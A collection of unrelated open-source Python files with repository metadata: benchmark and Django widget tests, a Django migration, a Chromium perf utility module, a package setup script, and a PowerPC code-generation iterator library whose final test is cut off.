def test_findbenchmarks(self):
class sample(Benchmark):
def benchSample1(self, input):
pass
def bench_Sample2(self, input):
pass
def sampleBench3(self, input):
pass
def bench_sample4(self):
pass
bms = sample()._find_benchmarks()
assert "benchSample1" in bms
assert "bench_Sample2" in bms
assert not "sampleBench3" in bms
assert "bench_sample4" in bms
def test_function_name_to_title(self):
bm = OneRun()
eq_(bm._function_name_to_title("bench_sample1_sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("benchSample1Sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("sample1_sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("Sample1Sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("_sample1_sample2_"), "Sample1 Sample2")
eq_(bm._function_name_to_title("XMLBenchmark"), "Xml Benchmark")
class TestCsvReporter(TestCase):
def test_write_titles(self):
class sample(OneRun):
def warmup(self):
return 0
def repeats(self):
return 0
def bench_sample1(self):
self.no_param = True
def bench_sample2(self, input):
self.one_param = True
bm = sample()
stream = StringIO()
bm.run(CsvReporter(stream))
output = stream.getvalue()
stream.close()
eq_("Values,Sample1,Sample2\n", output)
|
OldhamMade/unitbench
|
tests/test_unitbench.py
|
Python
|
bsd-3-clause
| 7,579
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0011_auto_20160526_0738'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='designation',
field=models.CharField(default=b'Student', max_length=10, choices=[(b'Teacher', b'Teacher'), (b'Student', b'Student')]),
),
]
|
BuildmLearn/University-Campus-Portal-UCP
|
UCP/login/migrations/0012_auto_20160529_0607.py
|
Python
|
bsd-3-clause
| 492
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import calendar
import datetime
import logging
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
TELEMETRY_TEST_PATH_FORMAT = 'telemetry'
GTEST_TEST_PATH_FORMAT = 'gtest'
def ApplyInParallel(function, work_list, on_failure=None):
"""Apply a function to all values in work_list in parallel.
Args:
function: A function with one argument.
work_list: Any iterable with arguments for the function.
on_failure: A function to run in case of a failure.
"""
if not work_list:
return
try:
# Note that this is speculatively halved as an attempt to fix
# crbug.com/953365.
cpu_count = multiprocessing.cpu_count() / 2
except NotImplementedError:
# Some platforms can raise a NotImplementedError from cpu_count()
logging.warning('cpu_count() not implemented.')
cpu_count = 4
pool = ThreadPool(min(cpu_count, len(work_list)))
def function_with_try(arg):
try:
function(arg)
except Exception: # pylint: disable=broad-except
# logging exception here is the only way to get a stack trace since
# multiprocessing's pool implementation does not save that data. See
# crbug.com/953365.
logging.exception('Exception while running %s' % function.__name__)
if on_failure:
on_failure(arg)
try:
pool.imap_unordered(function_with_try, work_list)
pool.close()
pool.join()
finally:
pool.terminate()
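# Hedged usage sketch (comment added for illustration; process_result and
# mark_failed are hypothetical callables, not part of this module):
#   ApplyInParallel(process_result, test_results, on_failure=mark_failed)
# Each element of test_results is passed to process_result on a thread pool;
# exceptions are logged and routed to mark_failed instead of propagating.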
def SplitTestPath(test_result, test_path_format):
""" Split a test path into test suite name and test case name.
Telemetry and Gtest have slightly different test path formats.
Telemetry uses '{benchmark_name}/{story_name}', e.g.
'system_health.common_desktop/load:news:cnn:2018'.
Gtest uses '{test_suite_name}.{test_case_name}', e.g.
'ZeroToFiveSequence/LuciTestResultParameterizedTest.Variant'
"""
if test_path_format == TELEMETRY_TEST_PATH_FORMAT:
separator = '/'
elif test_path_format == GTEST_TEST_PATH_FORMAT:
separator = '.'
else:
raise ValueError('Unknown test path format: %s' % test_path_format)
test_path = test_result['testPath']
if separator not in test_path:
raise ValueError('Invalid test path: %s' % test_path)
return test_path.split(separator, 1)
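# Illustrative comment (added): with the formats documented above,
#   SplitTestPath({'testPath': 'system_health.common_desktop/load:news:cnn:2018'},
#                 TELEMETRY_TEST_PATH_FORMAT)
# returns ['system_health.common_desktop', 'load:news:cnn:2018'], while the
# gtest format splits on the first '.' instead.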
def IsoTimestampToEpoch(timestamp):
"""Convert ISO formatted time to seconds since epoch."""
try:
dt = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ')
except ValueError:
dt = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%SZ')
return calendar.timegm(dt.timetuple()) + dt.microsecond / 1e6
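# Illustrative comment (added): both fractional and whole-second timestamps
# are accepted, e.g. IsoTimestampToEpoch('1970-01-01T00:00:01.5Z') == 1.5
# and IsoTimestampToEpoch('1970-01-01T00:00:01Z') == 1.0.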
def SetUnexpectedFailure(test_result):
"""Update fields of a test result in a case of processing failure."""
test_result['status'] = 'FAIL'
test_result['expected'] = False
logging.error('Processing failed for test %s', test_result['testPath'])
|
endlessm/chromium-browser
|
tools/perf/core/results_processor/util.py
|
Python
|
bsd-3-clause
| 2,989
|
import json
from django import forms
from django.test.utils import override_settings
from django_webtest import WebTest
from . import build_test_urls
class FileInputForm(forms.Form):
test_field = forms.FileField()
data_field = forms.BooleanField(required=False, widget=forms.HiddenInput,
help_text='To produce non empty POST for empty test_field')
@override_settings(ROOT_URLCONF=__name__)
class Test(WebTest):
default_form = FileInputForm
def test_default_usecase(self):
page = self.app.get(self.test_default_usecase.url)
self.assertIn('id="id_test_field_container"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field"', page.body.decode('utf-8'))
form = page.form
self.assertIn('test_field', form.fields)
response = form.submit(upload_files=[('test_field', __file__)])
response = json.loads(response.body.decode('utf-8'))
self.assertIn('cleaned_data', response)
self.assertIn('test_field', response['cleaned_data'])
self.assertEquals('InMemoryUploadedFile', response['cleaned_data']['test_field'])
def test_invalid_value(self):
form = self.app.get(self.test_invalid_value.url).form
form['data_field'] = '1'
response = form.submit()
self.assertIn('This field is required.', response.body.decode('utf-8'))
def test_part_group_class(self):
page = self.app.get(self.test_part_group_class.url)
self.assertIn('class="input-field file-field col s12 required yellow"', page.body.decode('utf-8'))
test_part_group_class.template = '''
{% form %}
{% part form.test_field group_class %}input-field file-field col s12 required yellow{% endpart %}
{% endform %}
'''
def test_part_add_group_class(self):
page = self.app.get(self.test_part_add_group_class.url)
self.assertIn('class="input-field file-field col s12 required deep-purple lighten-5"', page.body.decode('utf-8'))
test_part_add_group_class.template = '''
{% form %}
{% part form.test_field add_group_class %}deep-purple lighten-5{% endpart %}
{% endform %}
'''
def test_part_prefix(self):
response = self.app.get(self.test_part_prefix.url)
self.assertIn('<span>DATA</span>', response.body.decode('utf-8'))
test_part_prefix.template = '''
{% form %}
{% part form.test_field prefix %}<span>DATA</span>{% endpart %}
{% endform %}
'''
def test_part_add_control_class(self):
response = self.app.get(self.test_part_add_control_class.url)
self.assertIn('class="file-path orange"', response.body.decode('utf-8'))
test_part_add_control_class.template = '''
{% form %}
{% part form.test_field add_control_class %}orange{% endpart %}
{% endform %}
'''
def test_part_label(self):
response = self.app.get(self.test_part_label.url)
self.assertIn('<label for="id_test_field">My label</label>', response.body.decode('utf-8'))
test_part_label.template = '''
{% form %}
{% part form.test_field label %}<label for="id_test_field">My label</label>{% endpart %}
{% endform %}
'''
def test_part_help_text(self):
response = self.app.get(self.test_part_help_text.url)
self.assertIn('<small class="help-block">My help</small>', response.body.decode('utf-8'))
test_part_help_text.template = '''
{% form %}
{% part form.test_field help_text %}<small class="help-block">My help</small>{% endpart %}
{% endform %}
'''
def test_part_errors(self):
response = self.app.get(self.test_part_errors.url)
self.assertIn('<div class="errors"><small class="error">My Error</small></div>', response.body.decode('utf-8'))
test_part_errors.template = '''
{% form %}
{% part form.test_field errors%}<div class="errors"><small class="error">My Error</small></div>{% endpart %}
{% endform %}
'''
urlpatterns = build_test_urls(Test)
|
2947721120/django-material
|
tests/test_widget_fileinput.py
|
Python
|
bsd-3-clause
| 4,140
|
import os
from setuptools import setup, find_packages
CURRENT_DIR = os.path.dirname(__file__)
def read(fname):
return open(os.path.join(CURRENT_DIR, fname)).read()
# Info for setup
PACKAGE = 'reddit_view'
NAME = 'reddit_view'
DESCRIPTION = 'a reddit image collector'
AUTHOR = 'Jorge Perez'
AUTHOR_EMAIL = 'japrogramer@gmail.com'
URL = 'https://github.com/japrogramer/reddit_view'
VERSION = __import__(PACKAGE).__version__
# setup call
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=read('README.rst'),
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license='BSD',
url=URL,
packages=find_packages(exclude=["tests.*", "tests"]),
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
keywords = 'reddit images imgur links list subreddits',
install_requires=[
'requests',
'beautifulsoup4',
'fake-useragent',
],
zip_safe=False,
entry_points={
'console_scripts': ['reddit_view=reddit_view.__main__:main',],},
)
|
japrogramer/reddit_view
|
setup.py
|
Python
|
bsd-3-clause
| 1,317
|
# Copyright (c) 2006-2009 The Trustees of Indiana University.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# - Neither the Indiana University nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Iterator Hierarchy
import array
import random
# import Numeric
import corepy.lib.extarray as extarray
import corepy.arch.ppc.platform as synppc
import corepy.arch.ppc.isa as ppc
import corepy.arch.vmx.isa as vmx
import corepy.arch.ppc.types.ppc_types as vars
import corepy.arch.vmx.types.vmx_types as vmx_vars
import corepy.arch.ppc.lib.util as util
# import synnumeric
# import synbuffer
# import metavar
# import metavec
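# Added note: Numeric is not imported above, so the placeholder class below
# simply keeps the `type(a) is _numeric_type` branches in _typecode() and
# _array_address() harmless (they can never match).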
class _numeric_type: pass
def _typecode(a):
if type(a) in (_array_type, _extarray_type):
return a.typecode
elif type(a) is _numeric_type:
return a.typecode()
elif type(a) is memory_desc:
return a.typecode
else:
    raise Exception('Unknown array type ' + str(type(a)))
def _array_address(a):
if type(a) in (_array_type, _extarray_type):
return a.buffer_info()[0]
elif type(a) is _numeric_type:
return synnumeric.array_address(a)
elif type(a) is memory_desc:
return a.addr
else:
    raise Exception('Unknown array type ' + str(type(a)))
class ParallelInstructionStream(synppc.InstructionStream):
def __init__(self):
synppc.InstructionStream.__init__(self)
self.r_rank = self.acquire_register()
self.r_size = self.acquire_register()
return
def release_parallel_registers(self):
self.release_register(self.r_rank)
self.release_register(self.r_size)
return
def _save_registers(self):
"""
Add the parameter loading instructions to the prologue.
"""
synppc.InstructionStream._save_registers(self)
# Rank and Size are the only two parameters to the function. Note
# that the ABI conventions appear to be off by one word. r1
# contains the stack pointer.
# self._prologue.add(ppc.lwz(self.r_rank, 1, 24)) # param 1 should be + 24
# self._prologue.add(ppc.lwz(self.r_size, 1, 28)) # param 2 should be + 28
# Register parameter values
raise Exception('Fix this')
self._prologue.add(ppc.addi(self.r_rank, 3, 0))
self._prologue.add(ppc.addi(self.r_size, 4, 0))
return
# _numeric_type = type(Numeric.array(1))
_array_type = type(array.array('I', [1]))
_extarray_type = type(extarray.extarray('I', [1]))
CTR = 0
DEC = 1
INC = 2
class syn_iter(object):
def __init__(self, code, count, step = 1, mode = INC):
self.code = code
self.mode = mode
self.state = 0
self.n = count
self.step = step
self.r_count = None
self.r_stop = None
# Hack to allow the caller to supply the stop register
self.external_stop = False
self.current_count = None
self.start_label = None
return
def set_external_stop(self, r):
self.r_stop = r
self.external_stop = True
return
def get_start(self):
"""
Used in INC mode to start the count from somewhere other than
zero. Has no effect on CTR or DEC modes.
"""
return 0
def get_count(self):
return self.n
def n_steps(self):
return self.n / self.step
def step_size(self):
return self.step
def start(self, align = True, branch = True):
if self.r_count is None:
self.r_count = self.code.prgm.acquire_register()
if self.mode == CTR and branch:
if self.step_size() != 1:
raise Exception('CTR loops must have step_size of 1, you used ' + str(self.step_size()))
if self.external_stop:
self.code.add(ppc.mtctr(self.r_stop))
else:
util.load_word(self.code, self.r_count, self.n_steps())
self.code.add(ppc.mtctr(self.r_count))
self.code.prgm.release_register(self.r_count)
self.r_count = None
elif self.mode == DEC:
util.load_word(self.code, self.r_count, self.get_count())
elif self.mode == INC:
if self.r_stop is None and branch:
self.r_stop = self.code.prgm.acquire_register()
util.load_word(self.code, self.r_count, self.get_start())
if branch and not self.external_stop:
util.load_word(self.code, self.r_stop, self.get_count())
# /end mode if
if self.r_count is not None:
self.current_count = vars.UnsignedWord(code = self.code, reg = self.r_count)
if align and branch:
# Align the start of the loop on a 16 byte boundary
while (self.code.size()) % 4 != 0:
self.code.add(ppc.noop())
# Label
self.start_label = self.code.prgm.get_unique_label("SYN_ITER_START")
self.code.add(self.start_label)
return
def setup(self):
return
def get_current(self):
return self.current_count
def cleanup(self):
# Update the current count
if self.mode == DEC:
# Note: using addic here may cause problems with zip/nested loops...tread with caution!
self.code.add(ppc.addic_(self.r_count, self.r_count, -self.step_size()))
elif self.mode == INC:
self.code.add(ppc.addi(self.r_count, self.r_count, self.step_size()))
return
def end(self, branch = True):
if self.mode == CTR and branch:
self.code.add(ppc.bdnz(self.start_label))
elif self.mode == DEC:
# branch if r_count is not zero (CR)
# Note that this relies on someone (e.g. cleanup()) setting the
# condition register properly.
if branch:
self.code.add(ppc.bgt(self.start_label))
# Reset the counter in case this is a nested loop
util.load_word(self.code, self.r_count, self.get_count())
elif self.mode == INC:
# branch if r_current < r_stop
if branch:
self.code.add(ppc.cmpw(0, self.r_count, self.r_stop))
#self.code.add(ppc.cmp_(0, 2, self.r_count, self.r_stop))
self.code.add(ppc.blt(self.start_label))
      # Reset the current value in case this is a nested loop
util.load_word(self.code, self.r_count, self.get_start())
if self.r_count is not None:
self.code.prgm.release_register(self.r_count)
self.r_count = None
if self.r_stop is not None and not self.external_stop:
self.code.prgm.release_register(self.r_stop)
      self.r_stop = None  # was r_count: clear the register that was just released
return
def __iter__(self):
self.state = 0
self.start()
return self
def next(self):
if self.state == 0:
self.state = 1
self.setup()
return self.get_current()
else:
self.cleanup()
self.end()
raise StopIteration
return
class parallel(object):
def __init__(self, obj):
object.__init__(self)
self.obj = obj
if type(self.obj) is zip_iter:
self.obj.iters = [parallel(i) for i in self.obj.iters]
self.state = 0
return
def get_start(self): return self.obj.get_start()
def get_count(self): return self.obj.get_count()
def n_steps(self): return self.obj.n_steps()
def step_size(self): return self.obj.step_size()
def setup(self): return self.obj.setup()
def get_current(self): return self.obj.get_current()
def cleanup(self): return self.obj.cleanup()
def end(self, branch = True): return self.obj.end(branch)
def _update_inc_count(self):
code = self.obj.code
r_block_size = code.prgm.acquire_register()
r_offset = code.prgm.acquire_register()
# Determine the block size for each loop
util.load_word(code, r_block_size, self.get_count() - self.get_start())
code.add(ppc.divw(r_block_size, r_block_size, code.r_size))
# Determine the offset for the current block and update the r_count
# (this is primarily for range, which uses different values in r_count
# to initialize ranges that don't start at 0)
code.add(ppc.mullw(r_offset, code.r_rank, r_block_size))
code.add(ppc.add(self.obj.r_count, self.obj.r_count, r_offset))
if self.obj.r_stop is not None:
code.add(ppc.add(self.obj.r_stop, self.obj.r_count, r_block_size))
code.prgm.release_register(r_offset)
code.prgm.release_register(r_block_size)
return
def start(self, align = True, branch = True):
self.obj.start(align = False, branch = branch)
code = self.obj.code
# replace count with rank
if self.obj.mode == CTR:
raise Exception('Parallel CTR loops not supported')
elif self.obj.mode == DEC:
raise Exception('Parallel DEC loops not supported')
elif self.obj.mode == INC:
self._update_inc_count()
if align and branch:
# Align the start of the loop on a 16 byte boundary
while (code.size()) % 4 != 0:
code.add(ppc.noop())
# Update the real iterator's label
self.obj.start_label = code.prgm.get_unique_label("PARALLEL_START")
code.add(self.obj.start_label)
return
def end(self, branch = True):
self.obj.end(branch)
if self.obj.mode == CTR and branch:
raise Exception('Parallel CTR loops not supported')
elif self.obj.mode == DEC:
raise Exception('Parallel DEC loops not supported')
elif self.obj.mode == INC:
self._update_inc_count()
return
def init_address(self):
# Call syn_iters init self.code
self.obj.init_address(self)
# Update the address with the offset
# For variable iterators, this is the value already computed for r_count
self.obj.code.add(ppc.add(self.r_addr, self.r_addr, self.obj.r_count))
return
def __iter__(self):
self.start()
return self
def next(self):
if self.state == 0:
self.state = 1
self.setup()
return self.get_current()
else:
self.cleanup()
self.end()
raise StopIteration
return
class syn_range(syn_iter):
"""
Purpose: Iterate a set number of times and make the current
iteration count available as a variable.
"""
def __init__(self, code, start, stop = None, step = 1):
if stop is None:
stop = start
start = 0
syn_iter.__init__(self, code, stop, step = step, mode = INC)
self.istart = start
return
def get_start(self):
return self.istart
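# Illustrative comment (added): syn_range mirrors Python's range() semantics,
# e.g. syn_range(code, 20, 31) iterates counts 20..30 and
# syn_range(code, 20, 26, 2) iterates 20, 22, 24 -- see TestRange() below.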
_int_types = ('b', 'h', 'i', 'B', 'H', 'I')
_float_types = ('f','d')
_strides = {'b':1, 'h':2, 'i':4, 'B':1, 'H':2, 'I':4, 'f':4, 'd':8}
_loads = {'b':ppc.lbzx, 'h':ppc.lhax, 'i':ppc.lwzx,
'B':ppc.lbzx, 'H':ppc.lhzx, 'I':ppc.lwzx,
'f':ppc.lfsx, 'd':ppc.lfdx}
_stores = {'b':ppc.stbx, 'h':ppc.sthx, 'i':ppc.stwx,
'B':ppc.stbx, 'H':ppc.sthx, 'I':ppc.stwx,
'f':ppc.stfsx, 'd':ppc.stfdx}
class memory_desc(object):
def __init__(self, typecode, addr = None, size = None):
self.typecode = typecode
self.addr = addr
self.size = size
return
def __len__(self): return self.size
def from_buffer(self, b):
"""
Extract the address and size from a buffer object.
    Note: this doesn't work very well with buffer objects.
"""
l = repr(b).split(' ')
self.size = int(l[l.index('size') + 1])
self.addr = int(l[l.index('ptr') + 1][:-1], 0)
print l, self.size, self.addr
return
def from_ibuffer(self, m):
"""
Extract the address and size from an object that supports
the buffer interface.
This should be more flexible than the buffer object.
"""
self.addr, self.size = synbuffer.buffer_info(m)
return
_array_ppc_lu = { # array_typecode: ppc_type
'I': vars.Bits,
'I': vars.UnsignedWord,
'i': vars.SignedWord,
'f': vars.SingleFloat,
'd': vars.DoubleFloat
}
class var_iter(syn_iter):
"""
Purpose: Iterate over the values in a scalar array.
"""
# int_type = metavar.int_var
# float_type = metavar.float_var
type_lu = _array_ppc_lu
def __init__(self, code, data, step = 1, length = None, store_only = False, addr_reg = None, save = True):
self.var_type = None
self.reg_type = None
stop = 0
self.data = data
self.addr_reg = addr_reg
self.store_only = store_only
self.save = save
if length is None:
length = len(data)
if type(data) in (_array_type, _extarray_type):
if (data.typecode in self.type_lu.keys()):
self.var_type = self.type_lu[data.typecode]
if data.typecode in ('f', 'd'):
self.reg_type = 'fp'
else:
raise Exception('Unsupported array type: ' + data.typecode)
elif type(data) is _numeric_type:
raise Exception('Unsupported array type: ' + data.typecode)
elif type(data) is memory_desc:
if (data.typecode in self.type_lu.keys()):
self.var_type = self.type_lu[data.typecode]
if data.typecode in ('f', 'd'):
self.reg_type = 'fp'
else:
raise Exception('Unsupported memory type: ' + data.typecode)
else:
raise Exception('Unknown data type:' + str(type(data)))
t = _typecode(data)
step = _strides[t] * step
stop = _strides[t] * length # len(data)
self.typecode = t
syn_iter.__init__(self, code, stop, step, mode = INC)
self.r_current = None
self.r_addr = None
self.current_var = None
return
def get_current(self): return self.current_var
def load_current(self):
return self.code.add(_loads[self.typecode](self.r_current, self.r_addr, self.r_count))
def store_current(self):
return self.code.add(_stores[self.typecode](self.r_current, self.r_addr, self.r_count))
def make_current(self):
return self.var_type(code = self.code, reg = self.r_current)
def init_address(self):
if self.addr_reg is None:
return util.load_word(self.code, self.r_addr, _array_address(self.data))
def start(self, align = True, branch = True):
self.r_current = self.code.prgm.acquire_register(reg_type = self.reg_type)
# addr_reg is the user supplied address for the data
if self.addr_reg is None:
self.r_addr = self.code.prgm.acquire_register()
else:
self.r_addr = self.addr_reg
syn_iter.start(self, align, branch)
self.current_var = self.make_current()
self.init_address()
# print self.r_count, self.r_stop, self.r_current, self.r_addr, self.data.buffer_info()[0]
return
def setup(self):
if not self.store_only:
self.load_current()
syn_iter.setup(self)
return
def cleanup(self):
if self.current_var.assigned and self.save:
self.store_current()
syn_iter.cleanup(self)
return
def end(self, branch = True):
if self.r_current is not None:
self.code.prgm.release_register(self.r_current)
self.r_current = None
if self.r_addr is not None and self.addr_reg is None:
self.code.prgm.release_register(self.r_addr)
self.r_addr = None
syn_iter.end(self, branch)
return
_vector_sizes = {'b':16, 'h':8, 'i':4, 'B':16, 'H':8, 'I':4, 'f':4}
class vector_iter(var_iter):
"""
Purpose: Iterate over the values in a scalar array returning vectors
instead of vars.
"""
type_lu = vmx_vars.array_vmx_lu
def __init__(self, code, data, step = 1, length = None, store_only = False, addr_reg = None):
if type(data) not in (_array_type, _extarray_type, _numeric_type):
raise Exception('Unsupported array type')
if _typecode(data) not in _vector_sizes.keys():
raise Exception('Unsupported array data type for vector operations: ' + data.typecode)
var_iter.__init__(self, code, data,
step = (step * _vector_sizes[_typecode(data)]),
length = length,
store_only = store_only,
addr_reg = addr_reg)
# TODO - AWF - better way to force the reg_type to vector?
#self.reg_type = 'vector'
return
def load_current(self):
return self.code.add(vmx.lvx(self.r_current, self.r_count, self.r_addr))
def store_current(self):
return self.code.add(vmx.stvx(self.r_current, self.r_count, self.r_addr))
class zip_iter(syn_iter):
"""
Purpose: Manage a set of iterators.
"""
def __init__(self, code, *iters):
count = min([i.n_steps() for i in iters])
syn_iter.__init__(self, code, count, mode = INC)
self.iters = iters
return
def start(self, align = True, branch = True):
for i in self.iters: i.start(branch = False)
syn_iter.start(self, align, branch)
return
def setup(self):
for i in self.iters: i.setup()
syn_iter.setup(self)
return
def get_current(self):
return [i.get_current() for i in self.iters]
def cleanup(self):
for i in self.iters: i.cleanup()
syn_iter.cleanup(self)
return
def end(self, branch = True):
syn_iter.end(self, branch)
for i in self.iters: i.end(branch = False)
return
# class unroll_iter(syn_iter):
# """
# Purpose: Repeat an iterator body a set number of times. Optionally
# clone variables and reduce at the end of each iteration.
# """
# pass
# ------------------------------------------------------------
# Tests
# ------------------------------------------------------------
def TestIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
a = vars.SignedWord(0, code = code)
for i in syn_iter(code, 16, 4):
a.v = a + 1
for i in syn_iter(code, 16, 4, mode = DEC):
a.v = a + 1
for i in syn_iter(code, 16, 4, mode = INC):
a.v = a + 1
for i in syn_iter(code, 16, 4, mode = INC):
a.v = a + vars.SignedWord.cast(i)
util.return_var(a)
#a.release_register(code)
proc = synppc.Processor()
r = proc.execute(prgm)
# print 'should be 36:', r
assert(r == 36)
return
def TestExternalStop():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
# Data
data = array.array('d', range(5*5))
# Constants - read only
n_rows = vars.SignedWord(5)
n_cols = vars.SignedWord(5)
addr = vars.SignedWord(data.buffer_info()[0])
dbl_size = vars.SignedWord(synppc.WORD_SIZE * 2)
row_bytes = vars.SignedWord(synppc.WORD_SIZE * 5 * 2)
# Variables - read/write
sum = vars.DoubleFloat(0.0)
x = vars.DoubleFloat(0.0)
offset = vars.SignedWord(0)
# Iterators
i_iter = syn_iter(code, 0, mode = INC)
i_iter.set_external_stop(n_rows.reg)
j_ctr = syn_iter(code, 0, mode = CTR)
j_ctr.set_external_stop(n_cols.reg)
for i in i_iter:
offset.v = vars.SignedWord.cast(i) * row_bytes
# Note that j_cnt is unreadable since it's in the ctr register
for j_cnt in j_ctr:
      # Load the next value in the matrix
ppc.lfdx(x, addr, offset)
sum.v = vars.fmadd(x, x, sum) # sum += x*x
offset.v = offset + dbl_size
# code.add(ppc.Illegal())
util.return_var(sum)
proc = synppc.Processor()
r = proc.execute(prgm, mode = 'fp')
# print 'Test external stop: ', r
assert(r == 4900.0)
return
def TestNestedIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = vars.UnsignedWord(0)
for i in syn_iter(code, 5):
for j in syn_iter(code, 5):
for k in syn_iter(code, 5):
a.v = a + i + j + k
util.return_var(a)
#a.release_register()
proc = synppc.Processor()
r = proc.execute(prgm)
# print 'should be 750:', r
assert(r == 750)
return
def TestRange():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = vars.UnsignedWord(0)
for i in syn_range(code, 7):
a.v = a + 1
for i in syn_range(code, 20, 31):
a.v = a + 1
for i in syn_range(code, 20, 26, 2):
a.v = a + 1
util.return_var( a)
#a.release_register(code)
proc = synppc.Processor()
r = proc.execute(prgm)
# print 'should be 21:', r
assert(r == 21)
return
_expected = [10, 11, 12, 13]
def _array_check(result, expected = _expected):
#if result.typecode == 'b':
# for x, y in zip(result, expected):
# print "types", type(x), type(y)
# assert(ord(x) == y)
#else:
for x, y in zip(result, expected):
assert(x == y)
def TestVarIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = array.array('I', range(4))
for i in var_iter(code, a):
i.v = i + 10
ai = array.array('i', range(4))
for i in var_iter(code, ai):
i.v = i + 10
# b = array.array('H', range(4))
# for i in var_iter(code, b):
# i.v = i + 10
# bi = array.array('h', range(4))
# for i in var_iter(code, bi):
# i.v = i + 10
# c = array.array('B', range(4))
# for i in var_iter(code, c):
# i.v = i + 10
# ci = array.array('b', range(4))
# for i in var_iter(code, ci):
# i.v = i + 10
f = array.array('f', range(4))
f10 = vars.SingleFloat(10.0)
for i in var_iter(code, f):
i.v = i + f10
d = array.array('d', range(4))
d10 = vars.DoubleFloat(10.0)
for i in var_iter(code, d):
i.v = i + d10
proc = synppc.Processor()
r = proc.execute(prgm)
_array_check(a)
_array_check(ai)
# print b
# print bi
# print c
# print ci
_array_check(f)
_array_check(d)
  # print 'TODO: Implement the rest of the integer types (or have a clean way of upcasting to signed/unsigned int)'
return
def TestMemoryDesc():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = array.array('I', range(4))
m = memory_desc('I', a.buffer_info()[0], 4)
for i in var_iter(code, m):
i.v = i + 10
proc = synppc.Processor()
r = proc.execute(prgm)
_array_check(a)
return
# def TestMemoryMap():
# """
# Use mmap to map a file and a memory_desc to iterate over the contents.
# """
# import mmap
# import os
# filename = 'metaiter.TestMemoryMap.dat'
# # Create a file
# fw = open(filename, 'w')
# fw.write('-' * 64)
# fw.close()
# # Open the file again for memory mapping
# f = open(filename, 'r+')
# size = os.path.getsize(filename)
# m = mmap.mmap(f.fileno(), size)
# # Create a descriptor
# md = memory_desc('I')
# md.from_ibuffer(m)
# # Adjust the addr/size to iterate over the middle of the file
# md.addr += 16
# md.size = 8
# code = synppc.InstructionStream()
# # 32-bit word for the string 'XXXX'
# X = metavar.var(code, 0x58585858)
# # Replace the values in the file with X's
# for i in var_iter(code, md):
# i.v = X
# proc = synppc.Processor()
# r = proc.execute(code)
# return
def TestVecIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = extarray.extarray('I', range(16))
for i in vector_iter(code, a):
i.v = vmx.vadduws.ex(i, i)
ai = extarray.extarray('i', range(16))
for i in vector_iter(code, ai):
i.v = vmx.vaddsws.ex(i, i)
b = extarray.extarray('H', range(16))
for i in vector_iter(code, b):
i.v = vmx.vadduhs.ex(i, i)
bi = extarray.extarray('h', range(16))
for i in vector_iter(code, bi):
i.v = vmx.vaddshs.ex(i, i)
c = extarray.extarray('B', range(16))
for i in vector_iter(code, c):
i.v = vmx.vaddubs.ex(i, i)
ci = extarray.extarray('b', range(16))
for i in vector_iter(code, ci):
i.v = vmx.vaddsbs.ex(i, i)
ften = vmx_vars.BitType(10.0)
f = extarray.extarray('f', range(16))
for i in vector_iter(code, f):
i.v = vmx.vaddfp.ex(i, i)
proc = synppc.Processor()
r = proc.execute(prgm)
expected = [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30]
_array_check(a, expected)
_array_check(ai, expected)
_array_check(b, expected)
_array_check(bi, expected)
_array_check(c, expected)
_array_check(ci, expected)
_array_check(f, expected)
return
def TestZipIter():
prgm = synppc.Program()
code = prgm.get_stream()
ppc.set_active_code(code)
prgm.add(code)
a = extarray.extarray('I', range(16, 32))
b = extarray.extarray('I', range(32, 48))
c = extarray.extarray('I', [0 for i in range(16)])
sum = vars.UnsignedWord(0)
